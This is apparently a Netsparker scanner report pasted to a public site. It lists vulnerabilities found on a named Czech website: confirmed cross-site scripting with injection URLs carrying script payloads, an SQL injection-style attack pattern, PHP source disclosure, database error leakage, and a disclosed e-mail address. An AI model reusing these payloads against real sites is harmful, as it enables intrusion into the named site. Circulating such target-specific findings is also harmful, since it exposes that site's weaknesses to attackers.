- Injection URL: http://www.dpmp.cz/vyhledavani/?search='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x002147)%3C/script%3E&send=hledat
- Parameter Name: send
- Parameter Type: Querystring
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- ||| [Possible] Permanent Cross-site Scripting
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/vyhledavani/?fast_search=1&search='+NSFTW+'
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://www.dpmp.cz/vyhledavani/?fast_search=1&search='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00074D)%3C/script%3E
- Parameter Name: search
- Parameter Type: Querystring
- Attack Pattern: '+NSFTW+'
- ||| [Possible] PHP Source Code Disclosure
- Severity : Medium
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/content/image.php?uid=4f8f26bf5c57e
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- ||| Database Error Message
- Severity : Low
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: %27
- ||| E-mail Address Disclosure
- Severity : Information
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/novinky/
- Found E-mails: design@wizards.cz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement